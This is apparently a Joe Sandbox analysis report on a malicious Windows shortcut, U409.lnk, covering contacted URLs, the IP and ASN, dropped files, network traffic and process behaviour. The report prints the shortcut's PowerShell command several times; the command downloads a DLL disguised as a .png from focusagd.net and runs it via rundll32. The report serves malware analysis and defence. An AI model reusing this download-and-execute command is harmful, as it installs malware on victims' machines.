      https://go.micropowershell.exe, 00000000.00000002.460661565.000001B295B6F000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://contoso.com/powershell.exe, 00000000.00000002.461042349.000001B2A4685000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.461042349.000001B2A4685000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        https://contoso.com/Licensepowershell.exe, 00000000.00000002.461042349.000001B2A4685000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://focusagd.net/4REat6sBv0/1.png0ypowershell.exe, 00000000.00000002.452491884.000001B294832000.00000004.00000800.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/Iconpowershell.exe, 00000000.00000002.461042349.000001B2A4685000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://focusagd.netpowershell.exe, 00000000.00000002.457054218.000001B29538C000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.452137911.000001B294621000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://focusagd.net/4REat6sBv0/1.png-OutFile$env:TEMPpowershell.exe, 00000000.00000002.461543157.000001B2ACA6B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.451743155.000001B292700000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.451773245.000001B29275A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.451955432.000001B2929B0000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://focusagd.netpowershell.exe, 00000000.00000002.457013853.000001B295377000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.452491884.000001B294832000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://focusagd.net/4REat6sBv0/1.png1.0powershell.exe, 00000000.00000002.451842036.000001B292777000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            https://focusagd.netxpowershell.exe, 00000000.00000002.457013853.000001B295377000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            192.185.131.124
            focusagd.netUnited States
            46606UNIFIEDLAYER-AS-1UStrue
            IP
            192.168.2.1
            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:626149
            Start date and time: 13/05/202216:43:052022-05-13 16:43:05 +02:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 7m 58s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:U409.lnk
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:21
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal72.rans.winLNK@4/6@1/2
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 2
            • Number of non-executed functions: 2
            Cookbook Comments:
            • Found application associated with file extension: .lnk
            • Adjust boot time
            • Enable AMSI
            • Override analysis time to 240s for rundll32
            • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
            • Execution Graph export aborted for target powershell.exe, PID 5236 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            TimeTypeDescription
            16:44:24API Interceptor34x Sleep call for process: powershell.exe modified
            No context
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            UNIFIEDLAYER-AS-1US2Qhf8IMXPrGet hashmaliciousBrowse
            • 98.131.204.200
            https://leadscrapper.com/ev/ntsiaimiGet hashmaliciousBrowse
            • 192.254.236.149
            https://surveyatos.comGet hashmaliciousBrowse
            • 192.185.190.187
            payment advice.exeGet hashmaliciousBrowse
            • 142.4.0.135
            https://securepubads.g.doubleclick.net/pcs/view?adurl=https%3a%2f%2fquzqvm.codesandbox.io?dg=cHJ6ZW15c2xhdy5rcmF3Y3p5a293c2tpQG1hZXJza2RyaWxsaW5nLmNvbQ==Get hashmaliciousBrowse
            • 192.185.78.150
            M456_ __ ___ __.exeGet hashmaliciousBrowse
            • 142.4.0.135
            POZ1809027.bit.gz.exeGet hashmaliciousBrowse
            • 142.4.0.135
            Falconincorporation_Form_Dt_05.12.2022.xlsGet hashmaliciousBrowse
            • 192.254.239.248
            z4ehq74vWOGet hashmaliciousBrowse
            • 173.83.212.190
            https://apiservices.krxd.net/click_tracker/track?kx_event_uid=LR25EaJr&clk=http://51462046981xnZKorVuKVrP.praiadofortecabofrio.com.br/aa/jkwarburton@nuskin.comGet hashmaliciousBrowse
            • 162.241.102.156
            https://apiservices.krxd.net/click_tracker/track?kx_event_uid=LR25EaJr&clk=http://89204186061IBowccqdtxpJ.praiadofortecabofrio.com.br/aa/fournier@saskpolytech.caGet hashmaliciousBrowse
            • 162.241.102.156
            9mfbEdx1Hp.exeGet hashmaliciousBrowse
            • 192.185.174.178
            ORDER M52022.xlsxGet hashmaliciousBrowse
            • 192.185.174.178
            x86Get hashmaliciousBrowse
            • 162.144.117.208
            njC7yGDPxFGet hashmaliciousBrowse
            • 142.7.196.50
            tt.exeGet hashmaliciousBrowse
            • 192.185.174.19
            SO-127.xlsxGet hashmaliciousBrowse
            • 192.185.174.177
            DHL_AWB SHIPMENT DOCUMENTS.xlsxGet hashmaliciousBrowse
            • 192.185.174.178
            Colpal (1).zipGet hashmaliciousBrowse
            • 192.254.239.248
            rrRlkBgAuN.exeGet hashmaliciousBrowse
            • 192.185.211.151
            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            54328bd36c14bd82ddaa0c04b25ed9advaeNP8_1Pv_b(004).cmdGet hashmaliciousBrowse
            • 192.185.131.124
            SmartNetITStore_SECOND.ps1Get hashmaliciousBrowse
            • 192.185.131.124
            Report.vbsGet hashmaliciousBrowse
            • 192.185.131.124
            Floor_Factors.lnkGet hashmaliciousBrowse
            • 192.185.131.124
            EPI.lnkGet hashmaliciousBrowse
            • 192.185.131.124
            SecuriteInfo.com.Heur.906.xlsxGet hashmaliciousBrowse
            • 192.185.131.124
            6VIPGo475e.exeGet hashmaliciousBrowse
            • 192.185.131.124
            8rDJ5JmSAD.exeGet hashmaliciousBrowse
            • 192.185.131.124
            MAKo2bWh1R.exeGet hashmaliciousBrowse
            • 192.185.131.124
            n0z8Ep95rd.exeGet hashmaliciousBrowse
            • 192.185.131.124
            AZ2cy5s5OF.exeGet hashmaliciousBrowse
            • 192.185.131.124
            JrtkShv8bv.ps1Get hashmaliciousBrowse
            • 192.185.131.124
            Kaufvertrag.lnkGet hashmaliciousBrowse
            • 192.185.131.124
            4BDAd47i.txt.cmdGet hashmaliciousBrowse
            • 192.185.131.124
            Read Me.txt.cmdGet hashmaliciousBrowse
            • 192.185.131.124
            PO^^MAYIN00043INBOMSpecifications Sheet^^^^^d.exeGet hashmaliciousBrowse
            • 192.185.131.124
            JD001.exeGet hashmaliciousBrowse
            • 192.185.131.124
            SVZEFHXVJZXR_PAYMENT_COPY.VBSGet hashmaliciousBrowse
            • 192.185.131.124
            www.admin.booking.com_hotel_extranet_booking.html_res_id=3949896070.batGet hashmaliciousBrowse
            • 192.185.131.124
            No context
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):1192
            Entropy (8bit):5.325275554903011
            Encrypted:false
            SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
            MD5:05CF074042A017A42C1877FC5DB819AB
            SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
            SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
            SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Reputation:high, very likely benign file
            Preview:1
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Reputation:high, very likely benign file
            Preview:1
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):4447
            Entropy (8bit):3.784261743371929
            Encrypted:false
            SSDEEP:48:JIjV2QsH/lDnM3SoY8krSogZoLHM3SoY8krSogZonH:JIjVSflrDcHkDcHa
            MD5:FF079E662A9AB09673EC66C9EC8E6081
            SHA1:836B23EC0E20FCCE87D522B211D1D980373648AF
            SHA-256:3DE66A5F841FFC06C38BE9D73C001DE8EC15B693C92EA43C8E2704797A2558D8
            SHA-512:CD9D5CC3765553CCFF72EEF87FB7C3FD6F01ABA2C91F9F98B19FA8E511AC36F53EF6B15A4C02AEF4F73943979A454E5CDFBA7CB6919EE36B2FEE6C8C801311A8
            Malicious:false
            Preview:...................................FL..................F. .. ...U....3..TQ.^#g....4]#g...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&..........-..8...3.....^#g....Z.2......T.. .U409.lnk..B......hT...T..............................o.U.4.0.9...l.n.k.......O...............-.......N...........\..$.....C:\Users\user\Desktop\U409.lnk..`.......X.......305090...........!a..%.H.VZAj......s.........W...!a..%.H.VZAj......s.........W.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ...........................FL..................F.".. ....#N........{...#N......@...........................P.O. .:i.....+00.../C:\...................V.1.....hT....Windows.@......L...T............................%%..W.i.n.d.o.w.s.....Z.1.....hT....System32..B......L...T............................9.1.S.y.s.t.e.m.3.2.....l.1......L...WINDOW~1..T......L..T......W...................
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):4447
            Entropy (8bit):3.784261743371929
            Encrypted:false
            SSDEEP:48:JIjV2QsH/lDnM3SoY8krSogZoLHM3SoY8krSogZonH:JIjVSflrDcHkDcHa
            MD5:FF079E662A9AB09673EC66C9EC8E6081
            SHA1:836B23EC0E20FCCE87D522B211D1D980373648AF
            SHA-256:3DE66A5F841FFC06C38BE9D73C001DE8EC15B693C92EA43C8E2704797A2558D8
            SHA-512:CD9D5CC3765553CCFF72EEF87FB7C3FD6F01ABA2C91F9F98B19FA8E511AC36F53EF6B15A4C02AEF4F73943979A454E5CDFBA7CB6919EE36B2FEE6C8C801311A8
            Malicious:false
            Preview:...................................FL..................F. .. ...U....3..TQ.^#g....4]#g...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&..........-..8...3.....^#g....Z.2......T.. .U409.lnk..B......hT...T..............................o.U.4.0.9...l.n.k.......O...............-.......N...........\..$.....C:\Users\user\Desktop\U409.lnk..`.......X.......305090...........!a..%.H.VZAj......s.........W...!a..%.H.VZAj......s.........W.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ...........................FL..................F.".. ....#N........{...#N......@...........................P.O. .:i.....+00.../C:\...................V.1.....hT....Windows.@......L...T............................%%..W.i.n.d.o.w.s.....Z.1.....hT....System32..B......L...T............................9.1.S.y.s.t.e.m.3.2.....l.1......L...WINDOW~1..T......L..T......W...................
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
            Category:dropped
            Size (bytes):1191
            Entropy (8bit):5.254840999574827
            Encrypted:false
            SSDEEP:24:BxSAzyDvBB/nx2DOXUWFI1Jf9WmHjeTKKjX4CIym1ZJX2I1Jf/enxSAZea:BZ+v/foOlI1Jf0mqDYB1Z8I1JfYZZV
            MD5:2CBB07B047EBCB8AE957FAE83170FF5F
            SHA1:8EDFA10D183635D841ED6E0D17EA119A064E1715
            SHA-256:EAA4ECDC5F01C5C7B77B9214FAE5A9D93DABF172B528BE22F5ADC673FA1520D7
            SHA-512:83A4CF6E47B1BF2DE45613CC5AB072D3AE9A32CE28DD3B3CE13AD63F405C5929D05D9C44BE6E9FA92D5BA1FE8FDB0B98F3B176C296C5657BC84DC8F405A88EC9
            Malicious:false
            Preview:.**********************..Windows PowerShell transcript start..Start time: 20220513164424..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 305090 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Invoke-WebRequest https://focusagd.net/4REat6sBv0/1.png -OutFile $env:TEMP\file120.dll;Start-Process rundll32 $env:TEMP\file120.dll,DllInstall..Process ID: 5236..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220513164424..**********************..PS>Invoke-WebRequest https://focusagd.net/4REat6sBv0/1.png -OutFile $env:TEMP\file120.dll;Start-Process rundll32 $env:TEMP\file120.dll,DllInstall..**********************
            File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Wed Oct 6 12:53:12 2021, mtime=Fri May 13 13:33:12 2022, atime=Wed Oct 6 12:53:12 2021, length=452608, window=showminimized
            Entropy (8bit):4.522815845850403
            TrID:
            • Windows Shortcut (20020/1) 100.00%
            File name:U409.lnk
            File size:1519
            MD5:d4bda79d6f9b6edc1de19675054412bc
            SHA1:1121c9c0977f67d605e5dcf740f5f5a8465c0f1d
            SHA256:32add7446a9293f42c2db5b95afa2d722fb0b8a94baa6d4804e5d652a897fd7c
            SHA512:a6a1a38b69f34239dd5353db7ecd3421ec01eda256562cb5eb3f727b8e28eafcecc4c9b36a810d715d74e4da48234aa53ef7d981782ff6e66ad2c3c512c802a6
            SSDEEP:24:86etsz5tzRfDoKRh8WieAQkWuv+/CWzffXq93bUMkW0/91Z7/bJWm:86eqbzRfpsQOu69rHin7bJW
            TLSH:2931DD041BE20768D7F69F39FCB726229A737C16FE628F8D428041481C69114E865F7F
            File Content Preview:L..................F.... ....$'........_.f...$'..................................P.O. .:i.....+00.../C:\...................V.1......T....Windows.@........OwH.T.p..........................D...W.i.n.d.o.w.s.....Z.1......T....System32..B........OwH.T.p......
            Icon Hash:14ec98b2bae9ed0d

            General

            Relative Path:
            Command Line Argument:Invoke-WebRequest https://focusagd.net/4REat6sBv0/1.png -OutFile $env:TEMP\file120.dll;Start-Process rundll32 $env:TEMP\file120.dll,DllInstall
            Icon location:
            TimestampSource PortDest PortSource IPDest IP
            May 13, 2022 16:44:25.637516022 CEST49747443192.168.2.5192.185.131.124
            May 13, 2022 16:44:25.637573957 CEST44349747192.185.131.124192.168.2.5
            May 13, 2022 16:44:25.637680054 CEST49747443192.168.2.5192.185.131.124
            May 13, 2022 16:44:25.664722919 CEST49747443192.168.2.5192.185.131.124
            May 13, 2022 16:44:25.664755106 CEST44349747192.185.131.124192.168.2.5
            May 13, 2022 16:44:25.968442917 CEST44349747192.185.131.124192.168.2.5
            May 13, 2022 16:44:25.968573093 CEST49747443192.168.2.5192.185.131.124
            May 13, 2022 16:44:25.981261015 CEST49747443192.168.2.5192.185.131.124
            May 13, 2022 16:44:25.981296062 CEST44349747192.185.131.124192.168.2.5
            May 13, 2022 16:44:25.981667042 CEST44349747192.185.131.124192.168.2.5
            May 13, 2022 16:44:26.001305103 CEST49747443192.168.2.5192.185.131.124
            May 13, 2022 16:44:26.048496008 CEST44349747192.185.131.124192.168.2.5
            May 13, 2022 16:44:26.681396008 CEST44349747192.185.131.124192.168.2.5
            May 13, 2022 16:44:26.681466103 CEST44349747192.185.131.124192.168.2.5
            May 13, 2022 16:44:26.681531906 CEST49747443192.168.2.5192.185.131.124
            May 13, 2022 16:44:26.683955908 CEST49747443192.168.2.5192.185.131.124
            TimestampSource PortDest PortSource IPDest IP
            May 13, 2022 16:44:25.475189924 CEST5375753192.168.2.58.8.8.8
            May 13, 2022 16:44:25.619276047 CEST53537578.8.8.8192.168.2.5
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            May 13, 2022 16:44:25.475189924 CEST192.168.2.58.8.8.80xd3ddStandard query (0)focusagd.netA (IP address)IN (0x0001)
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            May 13, 2022 16:44:25.619276047 CEST8.8.8.8192.168.2.50xd3ddNo error (0)focusagd.net192.185.131.124A (IP address)IN (0x0001)
            • focusagd.net
            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.549747192.185.131.124443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampkBytes transferredDirectionData
            2022-05-13 14:44:25 UTC0OUTGET /4REat6sBv0/1.png HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
            Host: focusagd.net
            Connection: Keep-Alive
            2022-05-13 14:44:26 UTC0INHTTP/1.1 200 OK
            Date: Fri, 13 May 2022 14:44:26 GMT
            Server: Apache
            Upgrade: h2,h2c
            Connection: Upgrade, close
            Content-Length: 0
            Content-Type: text/html; charset=UTF-8


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:16:44:20
            Start date:13/05/2022
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest https://focusagd.net/4REat6sBv0/1.png -OutFile $env:TEMP\file120.dll;Start-Process rundll32 $env:TEMP\file120.dll,DllInstall
            Imagebase:0x7ff619710000
            File size:447488 bytes
            MD5 hash:95000560239032BC68B4C2FDFCDEF913
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Reputation:high

            Target ID:1
            Start time:16:44:20
            Start date:13/05/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff77f440000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Target ID:2
            Start time:16:44:27
            Start date:13/05/2022
            Path:C:\Windows\System32\rundll32.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\file120.dll DllInstall
            Imagebase:0x7ff7ebe30000
            File size:69632 bytes
            MD5 hash:73C519F050C20580F8A62C849D49215A
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Reset < >
              Memory Dump Source
              • Source File: 00000000.00000002.461754060.00007FF9F1B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff9f1b30000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7368387cb85a32973489e490e21b3c97d00c5368a56dce81f1448672741b51ce
              • Instruction ID: d13180c71dad613956078704427444f1ac593dee2519cf7e646e02b411fac1df
              • Opcode Fuzzy Hash: 7368387cb85a32973489e490e21b3c97d00c5368a56dce81f1448672741b51ce
              • Instruction Fuzzy Hash: 9651273190CA498FC305DB18D454BA5BBE5FF86310F8886BBE05CC71DACF68A99587C1
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.461754060.00007FF9F1B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff9f1b30000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 93144beda67a8aef1c8d99ab64966b7902ec09a65d9dc2ecb51730d8fe70bf90
              • Instruction ID: 152976f2c728cd1febb84cebdb6a987acf478b3b6edfaf3ce56198258214b5b8
              • Opcode Fuzzy Hash: 93144beda67a8aef1c8d99ab64966b7902ec09a65d9dc2ecb51730d8fe70bf90
              • Instruction Fuzzy Hash: AA21C43011CA498FE74DDF18D0956BAB7E0FF96350F54057EE08AC71A6EB26B882C741
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.461754060.00007FF9F1B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff9f1b30000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 3`_^
              • API String ID: 0-989691419
              • Opcode ID: dc18d5d5ca231b76ffe2b9846ea3aeb3900d2a18470de7c240520d8798b35f59
              • Instruction ID: b7057233446f0dee3f89e20c2e9fa560c81aee710864a692b62b95c94c72b188
              • Opcode Fuzzy Hash: dc18d5d5ca231b76ffe2b9846ea3aeb3900d2a18470de7c240520d8798b35f59
              • Instruction Fuzzy Hash: 50B1E863D0C9968FE742DB2CB8A62E63FD0FF52225B4D10B7C498CA4D7EE45785A4390
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.461754060.00007FF9F1B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff9f1b30000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d2cd98c825e6107704b0d71f593228a79b3a27ee0ca8bcbf46d8aa0588155f89
              • Instruction ID: 1a85662a0e7166ac051031acf2d5700105fb187b2bb97385d3d82ec80d39ecf8
              • Opcode Fuzzy Hash: d2cd98c825e6107704b0d71f593228a79b3a27ee0ca8bcbf46d8aa0588155f89
              • Instruction Fuzzy Hash: 4E323731A0C6468FE729EB2CA4412B5BBD0EF46321F5445BFC09DC759ADB69B89683C0
              Uniqueness

              Uniqueness Score: -1.00%